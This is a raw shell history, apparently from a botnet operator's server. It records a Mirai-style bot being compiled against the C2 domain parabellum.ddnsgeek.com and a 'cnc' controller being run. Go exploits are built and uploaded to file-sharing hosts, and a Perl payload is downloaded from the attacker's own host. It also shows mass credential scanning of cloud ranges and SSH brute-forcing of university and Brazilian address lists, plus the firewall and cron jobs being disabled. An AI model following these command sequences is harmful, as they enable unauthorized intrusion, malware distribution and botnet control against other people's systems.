cat .bash_history
screen python w00t3r.py -h amazon.txt -p 8080 -m 50 -t 10
ls
rm -rf amazon.txt 
nano amazon.txt
ls
screen python w00t3r.py -h amazon.txt -p 8080 -m 50 -t 10
ls
cat save.txt 
ps -aux
ls

ls
ps -aux
ls
cat result.txt 
ps -aux
cat result.txt 
ps -aux
cat username.txt 
cat result.txt 
ps -aux
sensors
ps -aux
cd ~
ls
./screenfetch-dev 
cd /var/tmp
ls
cat result.txt 
sensors
cat result.txt 
ps -aux
cat username.txt 
cat password.txt 
cat result.txt 
ps -aux
cat result.txt 
cd /var/www/html
ls
cp ok.sh ok2.sh
nano ok2.sh 
ls
cat ok2.sh 
nano ok2.sh 
ls
nano ok2.sh 
s
nano ok2.sh 
ls
nano ok2.sh 
ls
cat ok2.sh 
nano ok2.sh 
ls
nano ok2.sh 
s
ls
mv ok2.sh sshd
nano sshd
ls
cd /var/tmp
ls
cat result.txt 
mysql -p
cat result.txt 
cd /var/www/html
ls
cd 23
cd 231841564/
ls
cat mosley.pl 
cd /var/tmp/
çs
ls
cat result.txt 
ps -aux
cd ~
ls
screen ./cnc
mysql -p
ls
ps -aux
cd /var/tmp
ls
cat result.txt 
cd ~
ls
screen ./cnc
ls
cd /var/tmp
ls
cat result.txt 
wc -l result.txt 
ps -aux
ls
cat result.txt 
ps -aux
wc -l result.txt 
cat result.txt 
wc -l result.txt 
ps -aux
ls
cd /var/www/
ls
cd html
cd 231841564/
ls
nano mussolini.pl 
ls
cd /var/tmp
ls
cat result.txt 
ps -aux
cat result.txt 
ps -aux
cat result.txt 
wc -l result.txt 
ps -aux
wc -l result.txt 
ps -aux
wc -l result.txt 
cat result.txt 
mysql -p
cat result.txt 
wc -l result.txt 
ps -aux
ls
wc -l result.txt 
cat result.txt 
cd /var/www/html/231841564/
ls
nano sshd
cd ..
ls
nano sshd 
ls
cd /var/tmp
ls
wc -l result.txt 
ps -aux
wc -l result.txt 
ls
mysql -p
cd /var/tmp
ls
cat result.txt 
ps -aux
wc -l result.txt 
ps -aux
wc -l result.txt 
ps -aux
wc -l result.txt 
ps -aux
wc -l result.txt 
ps -aux
wc -l result.txt 
ps -aux
wc -l result.txt 
ps -aux
wc -l result.txt 
cat result.txt 
wc -l result.txt 
ps -aux
wc -l result.txt 
ps -aux
cd ~
screen ./cnc
ps -aux
wc -l result.txt 
cd /var/tmp
wc -l result.txt 
ps -aux
ls
cd /var/tmp
ls
wc -l result.txt 
sensors
ps -aux
ls
cat result.txt 
wc -l result.txt 
cd /var/www/html/231841564/
ls
cd ..
ls
cat ok.sh 
cd /var/www/html
ls
cd /var/tmp
ls
wc -l result.txt 
cd /var/tmp
wc -l result.txt 
ps -aux
wc -l result.txt 
ps -aux
wc -l result.txt 
cd /var/tmp
wc -l result.txt 
ps -aux
wc -l result.txt 
ps -aux
screen -r
ps -aux | grep cnc
cd ~
screen ./cnc
ps -aux
cd /var/tmp
la
ls
ls -la
l
ps -aux
ls
wc -l amazon.txt 
wc -l result.txt 
ps -aux
exit
ps -aux
screen -r
screen -r 27864
ls
screen -r
cat dns
ls
cat dns-updater 
ps -aux
reboot
ps -aux
service firewalld stop
service vsftpd start
service httpd start
service mariadb start
screen ./dns-updater 
screen ./cnc
exit
ls
service firewalld stop
service httpd start
service vsftpd start
screen ./dns-updater 
screen ./cnc
ps -aux
screen -r
screen -r 3394
ls
screen ./dns-updater 
ps -aux
screen -r
screen -r 2675
screen ./cnc
screen -r
screen -r 2987
screen -r 2973
ps -aux
screen -r
screen -r 2987
cd arquivos/
ls
cd backup/
ls
cat nb
cd nb
ls
cat exploit
cat exploit.go
ls
cat woot
cat woot.go 
ls
cd /var/tmp
ls
cd /var/www/html
ls
ps -aux
screen -r
screen -r 2973
screen -r 2987
service --help
service --status-all
service httpd status
service firewalld status
screen -r
screen -r 2973
ps -aux
screen -r
crontab -e
ps -aux
ls
screen -r
cd ~
./dns-updater 
cd ~
ls
cd duckdns/
ls
cat duck.sh 
rm -rf *
cd ..
ls
ps -aux
screen -r
ps -aux
screen -r
screen -r 2653.pts-0.nationalserver
ps -aux
nano dns-updater 
ls
screen -r
rm -rf duckdns/
yum remove cron -y
yum remove crond -y
nano dns-updater 
ls
screen -r
screen ./cnc
screen -r
screen -r 3591
screen -r 3574
screen -r
shutdown
nano dns-updater 
ls
ps -aux
w
history --last
last
last | head -1
last | head -2
last | head -3
last | head -4
last | head -5
last | head -7
last | head -9
last | head -10
last | head -11
last | head -12
last | head -13
last | head -14
last | head -15
ls
screen ./dns-updater 
ls
nano dns-updater 
ls
screen ./dns-updater 
cat /etc/resolv.conf 
nano /etc/resolv.conf 
ls
./dns-updater 
service firewalld stop
service vsftpd start
service httpd start
ps -aux
cron
/etc/init.d/crond stop  >/dev/null 2>&1 && sed '/^#/!s/^/#/' /var/spool/cron/$USER >/usr/local/bin/${USER}.cr.tmp && cat /usr/local/bin/${USER}.cr.tmp > /var/spool/cron/$USER ;/etc/init.d/crond start
ls
service cron stop
service crond stop
ls
screen ./dns-updater 
ls
screen ./cnc
screen -r
service mariadb start
screen -r
screen -r 2403
screwn -r
screen -r
screen -r 2390
curl ifconfig.me
exit
ps -aud
ps -aux
exit
l
cd arquivos/
ls
cd backup/
ls
cd nb
ls
nano exploit.go 
ls
rm -rf exploit
go build exploit.go 
curl --upload-file https://transfer.sh/exploit
curl --upload-file exploit https://transfer.sh/exploit
exit
ls
rpm -ivh https://www.dynu.com/support/downloadfile/30
nano /etc/dynuiuc/dynuiuc.conf
ls
systemctl restart dynuiuc.service
tail -f /var/log/dynuiuc.log
cat /var/log/dynuiuc.log 
systemctl status dynuiuc.service -l
ps -aux
time
hour
screen -r
ps -aux
ls
cd botnet
ls
cd ,,
ls
cd ..
ls
unzip milnet.zip 
nano build_payload.py 
ls
cd bot
ls
nano table.h 
nano table.c 
nano includes.h 
ls
nano main.c 
nano scanner.
nano scanner.c
LS
nano scanner.h
ls
nano includes.h 
ls
cd ..
ls
cd /var/www/html
ls
rm -rf 389242390482/ zatoempire.sh 
cd ~
ls
nano build.sh 
ls
nano build
nano build.sh 
ls
sh build.sh domain
cd /var/www/html
ls
cd 389242390482/
ls
cd ~
ls
nano build_payload.py 
python build_payload.py 
cd /var/tmp
ls
cd ~
ls
cd arquivos/backup/
ls
cd nb
ls
nano woot.go 
nano exploit.go 
ls
rm -rf exploit
go build exploit.go 
curl --upload-file exploit https://transfer.sh/
cd ~
ls
screen ./cnc
cd /var/www/html
ls
cat zatoempire.sh 
service httpd status
service firewalld status
screen -r
ps -aux
cd /var/tmp
ls
cat result.txt 
cd /var/www/html
ls
cd 231841564/
ls
cat mussolini.pl 
nano mussolini.pl 
ls
cd ~
ls
cd /var/www/html
ls
nano zatoempire.sh 
ls
cat zatoempire.sh 
nano zatoempire.sh 
ls
cat zatoempire.sh 
nano zatoempire.sh 
ls
ls
ps -aux
cd /etc/
ls
cd dynuiuc/
ls
nano dynuiuc.conf
ls
service dynuiuc restart
ls
cd /var/www/html
ls
nano zatoempire.sh 
cat zatoempire.sh 
nano zatoempire.sh 
ls
cd ~
ls
./monitora_bots 
ls
cd /var/www/html
ls
cd 389242390482/
ls
cd ..
kls
ls
cd 231841564/
ls
nano mussolini.pl 
ls
cd ~
ls
ps -aux
./monitora_bots 
ls
cd /var/www/html
ls
nano zatoempire.sh 
ls
cd ~
./monitora_bots 
cd ~/arquivos/
ls
cd backup/
ls
cd nb
ls
cat exploit.go 
cd /var/www/html
ls
nano zatoempire.sh 
cd ~
ls
nano bl.pl
ls
perl bl.pl 
nano vuln.txt
ls
perl bl.pl 
nano bl.pl .
perl bl.pl 
ls
nano 1.py
s
python 1.py 
python3.5 1.py 
python3 1.py 
python3.6 1.py 
python3 1.py 
python3.6 1.py 
cat 1.py 
wget https://transfer.sh/DyEye/pp.py
python pp.py ka
python3.6 pp.py ka
nano pp.py 
ks
çs
ls
wc -l vuln.txt 
wc -l vlun_list.txt 
cd /var/tmp
ls
wc -l tomlists.txt 
ls
screen -r
ls
screen ./cnc
ps -aux
service dynuiuc restart
cat /ajax/api/hook/decodeArguments
cat /var/log/dynuiuc.log
ls
unzip milnet.zip 
ls
nano enc.c 
cd bots
gcc enc.c -o enc -pthread
./enc
./enc string parabellum.ddnsgeek.com
cd bots
ls
cd bot
ls
nano scanner.c 
ls
nano scanner.h 
ls
nano includes.h 
ls
cd ..
ls
cat build.sh 
nano build.sh 
ls
cd bots
cd bot
nano table.h 
nano table.c
ls
nano main.c 
cd ..
ls
cd bots
ls
cd bot
ls
cat includes.h 
cd ..
sh build.sh domain
ls
service httpd restart
cd /var/www/html
ls
cat zatoempire.sh 
cd ~/arquivos/back
ls
cd ~/arquivos/backup/
ls
cd nb
cat exploit
cat exploit.go 
cd /var/www/html
ls
nano sshd 
ls
mv sshd ssh
cat ssh
nano sshd 
mv ssh init
nano init
s
mv init w0000
cat w0000 
cd arquivos/backup/nb
ls
cat exploit.go 
ls
cd arquivos/backup/nb
ls
rm -rf exploit
go build exploit.go 
curl --upload-file exploit https://transfer.sh/
curl --upload-file exploit https://d.chaifeng.com/
curl --upload-file exploit https://d.chaifeng.com/exploit
curl --upload-file exploit https://impi.sh/
exit
ls
cd arquivos/
çs
ls
cd backup/
cd nb
ls
cat exploit.go 
cd ~
ls
./monitora_bots 
 cd /var/www/html
ls
cd 389242390482/
ls
cd ..
ls
nano zatoempire.sh 
ls
cd ~
ls
./monitora_bots 
cd /var/www/html
ls
nano zatoempire.sh 
ls
cd ~
ls
./monitora_bots 
mysql -p
./monitora_bots 
mysql -p
./monitora_bots 
mysql -p
exit;
cd /var/www/html
ls
cd 3
cd 231841564/
ls
nano mussolini.pl 
ls
ls
cd /var/www/html
ls
nano host
ls
bash host 
nano host
s
bash host 
ls
cat host 
ls
cd 231841564/
ls
nano mussolini.pl 
ls
cd ~
ls
cd arquivos/
ls
cd backup/
ls
cd nb
ls
cat exploit.go 
ping www.g-portal.com
ping status.g-portal.com
ls
cd /var/tmp
ls
cd /var/www/html
ls
cd ranges/
ls
nano hetzner.zone
ls
nano softlayer.zone
ls
nano linode.zone
ls
nano alibaba.zone
ls
ls -la
screen -r
cd ~
ls
./monitora_bots 
cd /var/www/html
ls
nano zatoempire.sh 
ls
nano .htaccess 
cd ~
ls
./monitora_bots 
cd /var/www/html
ls
cd 389242390482/
ls
cat za
cat ../zatoempire.sh 
touch index.html
ls
cd ..
ls
rm -rf *.php
ls
cat sensi.sh 
rm -rf sensi.sh 
ls
cd ~
ls
cd arquivos/backup/nb
ls
cat exploit
cat exploit.go 
ls
nano exploit
nano exploit.go 
ls
rm -rf exploit
go build exploit.go 
curl --upload-file exploit https://impi.sh/
ps -aux
ls
cd /var/tmp
ls
cd /var/www/html
ls
nano zatoempire.sh 
ls
cat /etc/passwd
cat /proc/cpuinfo 
mysql -p
cd /var/www/html
ls
cd ~
ls
cd /var/tmp/
ls
curl ifconfig.me
cd /var/www/html
ls
cd 231841564/
ls
nano mussolini.pl 
ls
nano mussolini.pl 
cd ~
ls
cd arquivos/
ls
cd backup/
ls
cd nb
ls
cat exploit.go 
cd /var/www/html
ls
cd 231841564/
ls
cd ..
ls
nano zatoempire.sh 
ls
cd /var/www/html
ls
cd 231841564/
ls
cp mussolini.pl zato.pl
nano zato.pl 
ls
nano zato.pl 
s
ls
cd /var/www/html
ls
cd ranges/
ls
nano ufmg.zone
ls
cd /var/tmp
ls
cd ~
cd arquivos/
ls
cd tsm
ls
wget http://impi.sh/T2hg1/ufmg.txt
ls
cat p
nano p
ls
./tsm
screen ./tsm -t 200 -s 10 -S 10 -P 0 -p 22 p ufmg.txt 
netstat
cat v
netstat
screen -r
screen -r 6490.pts-4.nationalserver
screen -r
screen -r 27147.pts-0.nationalserver
nano p
s
ls
screen ./tsm -t 300 -s 10 -S 10 -P 0 -p 22 p ufmg.txt 
cat v
netstat
ls
cat v
netstat
ls
screen -r 27147.pts-0.nationalserver
screen -r
screen -r 27404.pts-0.nationalserver
cat v
cd /var/tmp
ls
cd ~
cd arquivos/
cd tsm
ls
cat v
ps -aux
screen -r
screen -r 27404
cd arquivos/tsm
ls
cat v
curl -O parabellum.ddnsgeek.com:8088/231841564/zato.pl --silent
cat v
ps -aux
screen -r
cd ~
ls
cd arquivos/tsm
ls
nano p
rm -rf p
nano p
ls
cd /var/www/html
ls
cd 231841564/
ls
cd /var/tmp
ls
cd ~/arquivos/tsm
ls
wget http://impi.sh
wget http://impi.sh/J0ToS/br22.txt
rm -rf br22.txt
mv br22.txt.1 br.txt
history
screen ./tsm -t 300 -s 10 -S 10 -P 0 -p 22 p  br.txt 
cat v
ps-aux
ps -aux
screen -r
screen -r 31157.pts-2.nationalserver
cat v
cd /var/tmp
ls
cd /var/www/html
ls
cd 231841564/
ls
nano zato.pl 
ls
cd ~
ls
cd arquivos/
ls
cd tsm
ls
cat v
screen -r
screen -r 31157.pts-2.nationalserver
nano p
ls
history
screen ./tsm -t 400 -s 10 -S 10 -P 0 -p 22 p  br.txt
ls
cat v
screen -r
screen -r 428.pts-2.nationalserver
cat v
screen -r 428.pts-2.nationalserver
ls
cat v
screen -r 428.pts-2.nationalserver
cat v
screen -r
screen -r 1116.pts-4.nationalserver
screen -r
screen -r 428.pts-2.nationalserver
ls
cd /var/tmp
ls
history | grep "python"
ls
mv result.txt 2.txt
screen python w00t3r.py -h google.txt -p 8080 -m 50 -t 10
cat google.txt 
rm -rf google.txt 
nano google.txt
screen python w00t3r.py -h google.txt -p 8080 -m 50 -t 10
çs
ls
ps -aux
screen -r
screen -r 1341.pts-2.nationalserver
ps -aux
cd ~
ls
screen ./cnc
screen -r
screen -r 1341.pts-2.nationalserver
cd /var/tmp
ls
cat result.txt 
ps -aux
ls
cat result.txt 
ps -aux
ls
cat result.txt
ps -aux
cat result.txt 
ls
cd arquivos/
ls
cd tsm
ls
cat v
ps -aux
cat v
screen -r


